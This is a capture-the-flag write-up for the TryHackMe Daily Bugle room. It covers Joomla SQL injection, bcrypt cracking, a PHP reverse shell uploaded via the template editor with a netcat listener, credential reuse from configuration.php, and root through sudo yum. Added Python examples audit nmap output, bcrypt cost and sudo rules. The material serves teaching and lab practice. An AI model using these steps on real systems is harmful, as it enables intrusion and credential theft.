TryHackMe Daily Bugle writeup !!

1. Introduction

Link to the room: https://tryhackme.com/room/dailybugle

Reported difficulty: Difficult

This room requires initial exploration of the Joomla CMS via SQL Injection, reverse shell upload and escalation of privileges with abuse of sudo permissions.


  1. User flag
  2. Root flag


  1. SQL Injection and access to Joomla administration
  2. Reverse shell upload and user flag
  3. Escalation of privileges





We started with nmap to identify open ports.

# Nmap 7.80 scan initiated Wed Jul 22 20:15:35 2020 as: nmap -sC -sV -v -oA nmap-initial 10.10.182.45
Nmap scan report for 10.10.182.45
Host is up (0.22s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-generator: Joomla! - Open Source Content Management
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   MariaDB (unauthorized)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 22 20:16:09 2020 -- 1 IP address (1 host up) scanned in 33.48 seconds


Ports 22 (SSH), 80 (HTTP) and 3306 (MySQL) are open. Right from the start, we also see that there is a robots.txt file that disallows crawling of several paths, including /administrator/.
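The scan output above is plain text that is easy to turn into structured data. The following example, added to this writeup and not part of the original, parses the port table and the http-robots.txt script block from nmap's normal output; the sample text embedded in it is a constructed excerpt of the scan shown above. The defender's point it makes is that a robots.txt Disallow list is public, so listing /administrator/ in it advertises the admin interface rather than hiding it; access to that path has to be controlled server-side.

```python
import re

# Constructed sample: an excerpt of the nmap -sC -sV output from this writeup,
# embedded so the example runs offline.
NMAP_OUTPUT = """\
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
3306/tcp open  mysql   MariaDB (unauthorized)
"""

# One line of the port table: "22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_open_ports(text):
    """Return a list of dicts for every port nmap reports as open."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


def parse_robots_disallow(text):
    """Collect the paths listed under nmap's http-robots.txt script output.

    NSE script output is prefixed with "| " for continuation lines and
    "|_" for the last line of a script block.
    """
    entries = []
    in_block = False
    for line in text.splitlines():
        if line.startswith("| http-robots.txt:"):
            in_block = True
            continue
        if not in_block:
            continue
        if not line.startswith("|"):
            break  # left the NSE output without a "|_" terminator
        entries.extend(line.lstrip("|_ ").split())
        if line.startswith("|_"):
            break  # "|_" closes the script block
    return entries


def exposed_admin_paths(disallowed):
    """Paths in robots.txt that point at administrative interfaces.

    robots.txt only asks well-behaved crawlers to stay away; anyone who reads
    it learns where the admin login lives, so these need real access control.
    """
    return [p for p in disallowed if "administrator" in p]


if __name__ == "__main__":
    for p in parse_open_ports(NMAP_OUTPUT):
        print(f"{p['port']}/{p['proto']} {p['service']}: {p['version']}")
    robots = parse_robots_disallow(NMAP_OUTPUT)
    print(f"{len(robots)} disallowed entries; admin paths: {exposed_admin_paths(robots)}")
```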

Accessing the server on port 80 displays a website with user login fields. Accessing the path /administrator displays the login screen of the Joomla CMS administration interface.

Using the Joomscan tool, we identified that the version of Joomla installed on this site is 3.7.0.


Researching available exploits for Joomla 3.7.0, we found that it is vulnerable to CVE-2017-8917, an SQL Injection vulnerability.

We found a script on Github that automates the exploitation of this vulnerability.

$ python exploit.py

    (...)
 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: fb9j5_users
  -  Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0ve...Zutm', '', '']


The password hash is in bcrypt format, as indicated by the prefix $2y$ at the beginning of the string. We use john to crack this hash.
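The structure of that hash is worth understanding before throwing a cracker at it. The following example, added here and not part of the original writeup, parses a bcrypt modular-crypt string into its variant, cost, salt and digest. The sample hash is constructed: it keeps the $2y$10$ prefix seen above but replaces the 53-character salt and digest tail with dummy characters of the right length. Cost 10 means 2^10 = 1024 key-expansion rounds, which is exactly the "Cost 1 (iteration count) is 1024" that john prints below; the check at the end flags costs under 10, the minimum work factor recommended by the OWASP Password Storage Cheat Sheet.

```python
import re

# Constructed sample: same variant and cost as the hash recovered from the
# Joomla database in this writeup, with a dummy 22-char salt and 31-char digest.
SAMPLE_HASH = "$2y$10$" + "0" * 22 + "A" * 31

# $<variant>$<cost>$<22-char salt><31-char digest>, all in bcrypt's base64 alphabet
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

MIN_RECOMMENDED_COST = 10


def parse_bcrypt(hash_string):
    """Split a bcrypt hash into its fields and derive the iteration count."""
    m = BCRYPT_RE.match(hash_string)
    if not m:
        raise ValueError("not a bcrypt modular-crypt string")
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    return {
        "variant": variant,        # "2y" is what PHP's password_hash() emits
        "cost": cost,
        "iterations": 2 ** cost,   # bcrypt runs 2^cost key-expansion rounds
        "salt": salt,
        "digest": digest,
    }


def is_bcrypt(value):
    """True if the value looks like a bcrypt hash at all (cheap triage check)."""
    return BCRYPT_RE.match(value) is not None


def cost_warning(parsed):
    """Return a warning string if the work factor is below the recommended minimum."""
    if parsed["cost"] < MIN_RECOMMENDED_COST:
        return (f"cost {parsed['cost']} ({parsed['iterations']} rounds) is below "
                f"the recommended minimum of {MIN_RECOMMENDED_COST}")
    return None


if __name__ == "__main__":
    info = parse_bcrypt(SAMPLE_HASH)
    print(f"variant={info['variant']} cost={info['cost']} rounds={info['iterations']}")
    print(cost_warning(info) or "work factor is acceptable")
```

Note that a sufficient work factor only slows guessing down; the cracked password below falls in under four minutes because it is in rockyou.txt, which no cost setting can fix.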

$ john -format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sp....3 # password redacted
1g 0:00:03:29 DONE (2020-07-22 22:04) 0.004773g/s 223.7p/s 223.7c/s 223.7C/s thelma1..setsuna
Use the "--show" option to display all of the cracked passwords reliably
Session completed


With the user jonah and the password discovered, we were able to log into the Joomla administrative interface.

From this interface, it is possible to upload files to the server. One option is the template manager, in the menu “Extensions” → “Templates” → “Templates”. With this functionality we can upload a PHP script that opens a reverse shell, such as the one available from PentestMonkey.

With the script on the server, we just start a local listener and request the script in a browser.

$ rlwrap nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.14.0.83] from (UNKNOWN) [10.10.182.45] 56630
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 21:14:12 up 55 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell


On the server, we read the file /var/www/html/configuration.php and find various information, including the username and password used to access MySQL:

public $user = 'root';
public $password = 'nv....Nu'; # password redacted


People often reuse passwords across services. A quick look at /home/ shows only the user jjameson. Trying the newly discovered password to log in as this user succeeds, giving us access to the first flag.

ash-4.2$ su jjameson
su jjameson
Password: nv...Nu
[jjameson@dailybugle ~]$ ls -l /home/jjameson
ls -l /home/jjameson
total 4
-rw-rw-r-- 1 jjameson jjameson 33 Dec 15 2019 user.txt


During internal enumeration of services and permissions, we identified that the user jjameson can run the command yum with root permissions.

[jjameson@dailybugle ~]$ sudo -l
sudo -l
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
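A `sudo -l` listing like the one above is the kind of thing an audit script should read and complain about. The following example, added here and not part of the original writeup, parses the rule section of `sudo -l` output and produces findings for rules that need attention: NOPASSWD (no re-authentication before privileged execution), `ALL` as a command, and package managers granted with unrestricted arguments, since tools such as yum load plugins and configuration from paths the caller controls and therefore cannot be safely delegated as a whole. The sample input is the output shown above, embedded as a constructed string; the fix on a real system is to remove the rule or restrict it to the exact subcommand and arguments needed.

```python
import os
import re

# Constructed sample: the `sudo -l` output from this writeup.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
"""

# A rule line: "(runas) TAG: TAG: /path/cmd args, /path/other"
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

# Package managers that load plugins or config from caller-chosen paths; a rule
# that hands one of these to sudo with free arguments is effectively a root grant.
PACKAGE_MANAGERS = {"yum", "dnf", "rpm", "apt", "apt-get", "pip"}


def parse_sudo_l(text):
    """Return the command rules from `sudo -l` output as a list of dicts."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tag_str, cmd_str = m.groups()
        tags = tag_str.replace(":", " ").split()
        for cmd in cmd_str.split(","):
            rules.append({"runas": runas.strip(), "tags": tags, "command": cmd.strip()})
    return rules


def audit_sudo_rules(rules):
    """Produce human-readable findings for risky rules."""
    findings = []
    for r in rules:
        cmd = r["command"]
        if cmd == "ALL":
            findings.append(f"'ALL' granted as ({r['runas']}): unrestricted root")
            continue
        parts = cmd.split()
        base = os.path.basename(parts[0])
        if "NOPASSWD" in r["tags"]:
            findings.append(f"NOPASSWD on {cmd}: no re-authentication before privileged use")
        if base in PACKAGE_MANAGERS and len(parts) == 1:
            findings.append(
                f"{cmd} as ({r['runas']}) with unrestricted arguments: package managers "
                f"load caller-controlled plugins/config; restrict to exact subcommands or remove"
            )
    return findings


if __name__ == "__main__":
    parsed = parse_sudo_l(SUDO_L_OUTPUT)
    for f in audit_sudo_rules(parsed):
        print("FINDING:", f)
```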


With this information, we just follow the GTFOBins entry for yum and access the root flag.

[jjameson@dailybugle ~]$ sh privesc
sh privesc
Loaded plugins: y
No plugin match for: y
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# ls -l /root
ls -l /root
total 8
-rw-------. 1 root root 1484 Dec 14  2019 anaconda-ks.cfg
-rw-r--r--  1 root root   33 Dec 15  2019 root.txt
